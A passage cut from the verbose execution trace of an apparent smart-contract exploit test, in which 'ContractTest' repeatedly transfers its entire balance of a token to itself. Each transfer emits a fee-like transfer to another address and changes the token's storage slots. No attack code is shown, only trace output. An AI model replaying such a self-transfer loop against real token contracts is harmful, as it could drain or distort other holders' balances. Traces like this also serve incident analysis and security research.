    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x377bb19845b697ee12d6a4e1fb4b43bb2f116d0cc0fc9540d3b561d08001e254 → 0x3161499452865946ce1e1fe257c2735f69928f354f2460ce0a36862f8819b806
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x00000000000000000000000000000000000000000000000000b36543060b0a90 → 0x00000000000000000000000000000000000000000000000000cc2b7b57a95016
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 110805026077580376 [1.108e17]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 110805026077580376 [1.108e17])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 6648301564654822 [6.648e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 98616473209046536 [9.861e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x3161499452865946ce1e1fe257c2735f69928f354f2460ce0a36862f8819b806 → 0x2bf2beecf786ee5b6ca667c8aceede64750853b4de3b7464e94e844f5d964ec6
    │   │   │   │   @ 10: 0x00000000000000000000000000000000000000000000000000b1e7d121230494 → 0x00000000000000000000000000000000000000000000000000bdb71d4bb27f07
    │   │   │   │   @ 8: 0x00000000000000000000000000000000000000000000000003251a13ee2d5375 → 0x000000000000000000000000000000000000000000000000031d3a8bd1cdac7e
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x24e0cb1277c821799a19ecb5c3e5fbf6e34a72c38167e3649d6b1ac158034abf → 0x27d7453f350da1a2bd387591891cf88cf9ea17075384fee07643522a5dc0ac57
    │   │   │   │   @ 9: 0x7f671bd9f043c587105d1467c3adb7a102764a135007a127525005eade80eb57 → 0x79f8913295445a9baee55c4e18da22a60dec0e92df1eb4be3168040ab3fd8217
    │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000000163cfa242460cb3 → 0x000000000000000000000000000000000000000000000000017b6e3a97650199
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x00000000000000000000000000000000000000000000000000cc2b7b57a95016 → 0x00000000000000000000000000000000000000000000000000e3ca13acc844fc
    │   │   │   │   @ 11: 0x00000000000000000000000000000000000000000000000000769a8b6b6cac8b → 0x000000000000000000000000000000000000000000000000007e7a1387cc5382
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 105717813705275245 [1.057e17]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 105717813705275245 [1.057e17])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 6343068822316514 [6.343e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 94088854197694970 [9.408e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 11: 0x000000000000000000000000000000000000000000000000007e7a1387cc5382 → 0x0000000000000000000000000000000000000000000000000085fd127671e022
    │   │   │   │   @ 10: 0x00000000000000000000000000000000000000000000000000bdb71d4bb27f07 → 0x00000000000000000000000000000000000000000000000000c8fb9bb1aad1f8
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x2bf2beecf786ee5b6ca667c8aceede64750853b4de3b7464e94e844f5d964ec6 → 0x271d29ec80239c0d531aa39123c3124815e14795507f72b6f5e8d4b067d10c7c
    │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000017b6e3a97650199 → 0x0000000000000000000000000000000000000000000000000191f7376355a77b
    │   │   │   │   @ 8: 0x000000000000000000000000000000000000000000000000031d3a8bd1cdac7e → 0x0000000000000000000000000000000000000000000000000315b78ce3281fde
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x27d7453f350da1a2bd387591891cf88cf9ea17075384fee07643522a5dc0ac57 → 0x2a7a50b3d343ce9269e5daa05f0ba99ae84c31e7f139727487e983df8a60e2b3
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x00000000000000000000000000000000000000000000000000e3ca13acc844fc → 0x00000000000000000000000000000000000000000000000000fa531078b8eade
    │   │   │   │   @ 9: 0x79f8913295445a9baee55c4e18da22a60dec0e92df1eb4be3168040ab3fd8217 → 0x7522fc321de1084d955998168fae5689aec502735162b3103e02546bbe383fcd
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 100949389191023466 [1.009e17]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 100949389191023466 [1.009e17])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 6056963351461407 [6.056e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 89844956380010887 [8.984e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x00000000000000000000000000000000000000000000000000fa531078b8eade → 0x000000000000000000000000000000000000000000000000010fd7d725b428fd
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x271d29ec80239c0d531aa39123c3124815e14795507f72b6f5e8d4b067d10c7c → 0x22cfb73b720b36aa15d21cef8937122d0bc70ca4e08b81f6a3ebd02404ce72a2
    │   │   │   │   @ 10: 0x00000000000000000000000000000000000000000000000000c8fb9bb1aad1f8 → 0x00000000000000000000000000000000000000000000000000d3bdff08287107
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x2a7a50b3d343ce9269e5daa05f0ba99ae84c31e7f139727487e983df8a60e2b3 → 0x2cd31ae5daf405e76e6e58bb8aaab803f9eb85960e0c2c4eba3a542abbd8e495
    │   │   │   │   @ 8: 0x0000000000000000000000000000000000000000000000000315b78ce3281fde → 0x000000000000000000000000000000000000000000000000030e8b4aa97f0b29
    │   │   │   │   @ 9: 0x7522fc321de1084d955998168fae5689aec502735162b3103e02546bbe383fcd → 0x70d589810fc8a2ea58111174f522566ea4aac782e16ec24fec054fdf5b35a5f3
    │   │   │   │   @ 11: 0x0000000000000000000000000000000000000000000000000085fd127671e022 → 0x000000000000000000000000000000000000000000000000008d2954b01af4d7
    │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000000191f7376355a77b → 0x00000000000000000000000000000000000000000000000001a77bfe1050e59a
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 96489964395822194 [9.648e16]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 96489964395822194 [9.648e16])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 5789397863749331 [5.789e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 85876068312281755 [8.587e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 11: 0x000000000000000000000000000000000000000000000000008d2954b01af4d7 → 0x0000000000000000000000000000000000000000000000000094047919263c72
    │   │   │   │   @ 8: 0x000000000000000000000000000000000000000000000000030e8b4aa97f0b29 → 0x0000000000000000000000000000000000000000000000000307b0264073c38e
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x22cfb73b720b36aa15d21cef8937122d0bc70ca4e08b81f6a3ebd02404ce72a2 → 0x1efb6d511104dc6af7c2e754307f31be0c9f0c9b88634d98d399a1a782ab2472
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x2cd31ae5daf405e76e6e58bb8aaab803f9eb85960e0c2c4eba3a542abbd8e495 → 0x2ee9ceda0fe03731acd79d35a3c6dfccee95c9870254f561c02f60a3cda44d85
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x000000000000000000000000000000000000000000000000010fd7d725b428fd → 0x0000000000000000000000000000000000000000000000000124694460d5ffd0
    │   │   │   │   @ 9: 0x70d589810fc8a2ea58111174f522566ea4aac782e16ec24fec054fdf5b35a5f3 → 0x6d013f96aec248ab3a01dbd99c6a75ffa582c77989468df21bb32162d91257c3
    │   │   │   │   @ 10: 0x00000000000000000000000000000000000000000000000000d3bdff08287107 → 0x00000000000000000000000000000000000000000000000000de06b5a5b95c70
    │   │   │   │   @ 12: 0x00000000000000000000000000000000000000000000000001a77bfe1050e59a → 0x00000000000000000000000000000000000000000000000001bc0d6b4b72bc6d
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 92331520373120632 [9.233e16]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 92331520373120632 [9.233e16])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 5539891222387237 [5.539e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 82175053132077365 [8.217e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x0000000000000000000000000000000000000000000000000124694460d5ffd0 → 0x000000000000000000000000000000000000000000000000013817c4d13d99f5
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x2ee9ceda0fe03731acd79d35a3c6dfccee95c9870254f561c02f60a3cda44d85 → 0x30c5b1922041c973626bdc50cdda0cc10e67e0ac5785260baefda7b4455bfa71
    │   │   │   │   @ 11: 0x0000000000000000000000000000000000000000000000000094047919263c72 → 0x000000000000000000000000000000000000000000000000009a93f93e9e1a7e
    │   │   │   │   @ 9: 0x6d013f96aec248ab3a01dbd99c6a75ffa582c77989468df21bb32162d91257c3 → 0x6998ca9a90ba11f193550bfa1b6c51282384c5be9070c3ec56f8b8240819f64f
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x1efb6d511104dc6af7c2e754307f31be0c9f0c9b88634d98d399a1a782ab2472 → 0x1b92f854f2fca5b151161774af810ce68aa10ae08f8d83930edf3868b1b2c2fe
    │   │   │   │   @ 10: 0x00000000000000000000000000000000000000000000000000de06b5a5b95c70 → 0x00000000000000000000000000000000000000000000000000e7ddf5dded2982
    │   │   │   │   @ 8: 0x0000000000000000000000000000000000000000000000000307b0264073c38e → 0x000000000000000000000000000000000000000000000000030120a61afbe582
    │   │   │   │   @ 12: 0x00000000000000000000000000000000000000000000000001bc0d6b4b72bc6d → 0x00000000000000000000000000000000000000000000000001cfbbebbbda5692
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 88468056622743966 [8.846e16]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 88468056622743966 [8.846e16])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 5308083397364637 [5.308e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 78736570394242132 [7.873e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 11: 0x000000000000000000000000000000000000000000000000009a93f93e9e1a7e → 0x00000000000000000000000000000000000000000000000000a0dd32bc659e5d
    │   │   │   │   @ 9: 0x6998ca9a90ba11f193550bfa1b6c51282384c5be9070c3ec56f8b8240819f64f → 0x66904e01dc65f5ad09f64e25eb05cb3f98ce91a8c3c41547ea998cd927f531fd
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x30c5b1922041c973626bdc50cdda0cc10e67e0ac5785260baefda7b4455bfa71 → 0x326d3b59c86faa59133aff8e0fd9cb561b89eca5817763f58605d1fa51fc3ff2
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x000000000000000000000000000000000000000000000000013817c4d13d99f5 → 0x000000000000000000000000000000000000000000000000014af3714a942592
    │   │   │   │   @ 10: 0x00000000000000000000000000000000000000000000000000e7ddf5dded2982 → 0x00000000000000000000000000000000000000000000000000f14bcc1a986f50
    │   │   │   │   @ 8: 0x000000000000000000000000000000000000000000000000030120a61afbe582 → 0x00000000000000000000000000000000000000000000000002fad76c9d3461a3
    │   │   │   │   @ 12: 0x00000000000000000000000000000000000000000000000001cfbbebbbda5692 → 0x00000000000000000000000000000000000000000000000001e297983530e22f
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x1b92f854f2fca5b151161774af810ce68aa10ae08f8d83930edf3868b1b2c2fe → 0x188a7bbc3ea8896cc7b759a07f1a86fdffead6cac2e0d4eea2800d1dd18dfeac
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 84895948085811865 [8.489e16]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 84895948085811865 [8.489e16])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 5093756885148711 [5.093e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 75557393796372562 [7.555e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x188a7bbc3ea8896cc7b759a07f1a86fdffead6cac2e0d4eea2800d1dd18dfeac → 0x15d76901234932cdab23df70dc51b6cf89b7a6a380da8d5b67d7aa9bcbc55819
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x326d3b59c86faa59133aff8e0fd9cb561b89eca5817763f58605d1fa51fc3ff2 → 0x33e62e4b7a4693ccd11cf2ee34f5795021aecbd2be38e7e31d0166a8c5f985e5
    │   │   │   │   @ 9: 0x66904e01dc65f5ad09f64e25eb05cb3f98ce91a8c3c41547ea998cd927f531fd → 0x63dd3b46c1069f0ded62d3f6483cfb11229b618181bdcdb4aff12a57222c8b6a
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x000000000000000000000000000000000000000000000000014af3714a942592 → 0x000000000000000000000000000000000000000000000000015d0c2ffc4a49b9
    │   │   │   │   @ 11: 0x00000000000000000000000000000000000000000000000000a0dd32bc659e5d → 0x00000000000000000000000000000000000000000000000000a6e5724cf7aa6a
    │   │   │   │   @ 8: 0x00000000000000000000000000000000000000000000000002fad76c9d3461a3 → 0x00000000000000000000000000000000000000000000000002f4cf2d0ca25596
    │   │   │   │   @ 10: 0x00000000000000000000000000000000000000000000000000f14bcc1a986f50 → 0x00000000000000000000000000000000000000000000000000fa582b73738163
    │   │   │   │   @ 12: 0x00000000000000000000000000000000000000000000000001e297983530e22f → 0x00000000000000000000000000000000000000000000000001f4b056e6e70656
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 81614458182043513 [8.161e16]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 81614458182043513 [8.161e16])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 4896867490922610 [4.896e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 72636867782018728 [7.263e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 9: 0x63dd3b46c1069f0ded62d3f6483cfb11229b618181bdcdb4aff12a57222c8b6a → 0x61762d2a78063ffa68e6d920cf6329b4f3a00fad4fcb86adfd70d0e6ec715f50
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x000000000000000000000000000000000000000000000000015d0c2ffc4a49b9 → 0x000000000000000000000000000000000000000000000000016e71dccb994a2b
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x15d76901234932cdab23df70dc51b6cf89b7a6a380da8d5b67d7aa9bcbc55819 → 0x13705ae4da48d3ba26a7e49b6377e5735abc54cf4ee84654b557512b960a2bff
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x33e62e4b7a4693ccd11cf2ee34f5795021aecbd2be38e7e31d0166a8c5f985e5 → 0x3535aa5ae7e9b063196093058e2677255294f8750802e0154fd30bceb4bcb539
    │   │   │   │   @ 11: 0x00000000000000000000000000000000000000000000000000a6e5724cf7aa6a → 0x00000000000000000000000000000000000000000000000000acb2013cbcaa90
    │   │   │   │   @ 10: 0x00000000000000000000000000000000000000000000000000fa582b73738163 → 0x00000000000000000000000000000000000000000000000001030b01db1b019c
    │   │   │   │   @ 12: 0x00000000000000000000000000000000000000000000000001f4b056e6e70656 → 0x00000000000000000000000000000000000000000000000002061603b63606c8
    │   │   │   │   @ 8: 0x00000000000000000000000000000000000000000000000002f4cf2d0ca25596 → 0x00000000000000000000000000000000000000000000000002ef029e1cdd5570
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 78626483523854661 [7.862e16]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 78626483523854661 [7.862e16])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 4717589011431279 [4.717e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 69977570336230650 [6.997e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 10: 0x00000000000000000000000000000000000000000000000001030b01db1b019c → 0x000000000000000000000000000000000000000000000000010b6c517fb78153
    │   │   │   │   @ 12: 0x00000000000000000000000000000000000000000000000002061603b63606c8 → 0x0000000000000000000000000000000000000000000000000216d8a2ff6f0637
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x13705ae4da48d3ba26a7e49b6377e5735abc54cf4ee84654b557512b960a2bff → 0x114cf4bc51a218b80480407e7b789a8dd8841c15db905349188983e1fbbeb82f
    │   │   │   │   @ 9: 0x61762d2a78063ffa68e6d920cf6329b4f3a00fad4fcb86adfd70d0e6ec715f50 → 0x5f52c701ef5f84f846bf3503e763decf7167d6f3dc7393a260a3039d5225eb80
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x000000000000000000000000000000000000000000000000016e71dccb994a2b → 0x000000000000000000000000000000000000000000000000017f347c14d2499a
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x3535aa5ae7e9b063196093058e2677255294f8750802e0154fd30bceb4bcb539 → 0x36603f2b32732daef089053f0c1412c0f04e2028365dca6a0735af0907a08cc9
    │   │   │   │   @ 11: 0x00000000000000000000000000000000000000000000000000acb2013cbcaa90 → 0x00000000000000000000000000000000000000000000000000b248365524ffb5
    │   │   │   │   @ 8: 0x00000000000000000000000000000000000000000000000002ef029e1cdd5570 → 0x00000000000000000000000000000000000000000000000002e96c690475004b
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 75939652093735996 [7.593e16]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 75939652093735996 [7.593e16])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 4556379125624159 [4.556e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 67586290363425039 [6.758e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 9: 0x5f52c701ef5f84f846bf3503e763decf7167d6f3dc7393a260a3039d5225eb80 → 0x5d6b979b4ccb2124125455f9a13f122dfb52b1bdb487d668e17e4647823628f6
    │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000000216d8a2ff6f0637 → 0x000000000000000000000000000000000000000000000000022708a3aeadb396
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x114cf4bc51a218b80480407e7b789a8dd8841c15db905349188983e1fbbeb82f → 0x0f65c555af0db4e3d01561743553cdec626ef6dfb3a4960f9964c68c2bcef5a5
    │   │   │   │   @ 8: 0x00000000000000000000000000000000000000000000000002e96c690475004b → 0x00000000000000000000000000000000000000000000000002e4071374b5712c
    │   │   │   │   @ 10: 0x000000000000000000000000000000000000000000000000010b6c517fb78153 → 0x00000000000000000000000000000000000000000000000001138451d756d802
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x000000000000000000000000000000000000000000000000017f347c14d2499a → 0x000000000000000000000000000000000000000000000000018f647cc410f6f9
    │   │   │   │   @ 11: 0x00000000000000000000000000000000000000000000000000b248365524ffb5 → 0x00000000000000000000000000000000000000000000000000b7ad8be4e48ed4
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x36603f2b32732daef089053f0c1412c0f04e2028365dca6a0735af0907a08cc9 → 0x3769fbeed0f2a9fe96bf3d8dcefaa0cde9ed57c4d8f52c0c5989f4901af7c697
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 73567977344220539 [7.356e16]
    │   │   ├─ [63090] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 73567977344220539 [7.356e16])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdC57CCD9E2a1D89e1E6a9dd8fdC8d54636B286e6, value: 4414078640653232 [4.414e15])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 65475499836356281 [6.547e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0f65c555af0db4e3d01561743553cdec626ef6dfb3a4960f9964c68c2bcef5a5 → 0x0db42d1160eaeb4fe5728204e9ad3e7ab1325abbf757057db7953cecaf85ab53
    │   │   │   │   @ 10: 0x00000000000000000000000000000000000000000000000001138451d756d802 → 0x000000000000000000000000000000000000000000000000011b5b9c3a0859da
    │   │   │   │   @ 0x7cc87a245c2f19c1b5ddd354fe1cd9431a40cb027369f82a28453669270757b7: 0x3769fbeed0f2a9fe96bf3d8dcefaa0cde9ed57c4d8f52c0c5989f4901af7c697 → 0x38567d886fee5dc91e4f6cea6d5373140c5e917a64bfc7d0dbdcd098232e4bc7
    │   │   │   │   @ 0x372584ccb897dea57f338549852895f140afc7e19e5265b22e36546a317581dc: 0x000000000000000000000000000000000000000000000000018f647cc410f6f9 → 0x000000000000000000000000000000000000000000000000019f13118973faa9
    │   │   │   │   @ 11: 0x00000000000000000000000000000000000000000000000000b7ad8be4e48ed4 → 0x00000000000000000000000000000000000000000000000000bce7bd7c05900e
    │   │   │   │   @ 8: 0x00000000000000000000000000000000000000000000000002e4071374b5712c → 0x00000000000000000000000000000000000000000000000002decce1dd946ff2
    │   │   │   │   @ 9: 0x5d6b979b4ccb2124125455f9a13f122dfb52b1bdb487d668e17e4647823628f6 → 0x5bb9ff56fea8579027b1768a559882bc4a161599f83a45d6ffaebca805ecdea4
    │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000022708a3aeadb396 → 0x0000000000000000000000000000000000000000000000000236b7387410b746
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16212] 0xb5a0Ce3Acd6eC557d39aFDcbC93B07a1e1a9e3fa::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
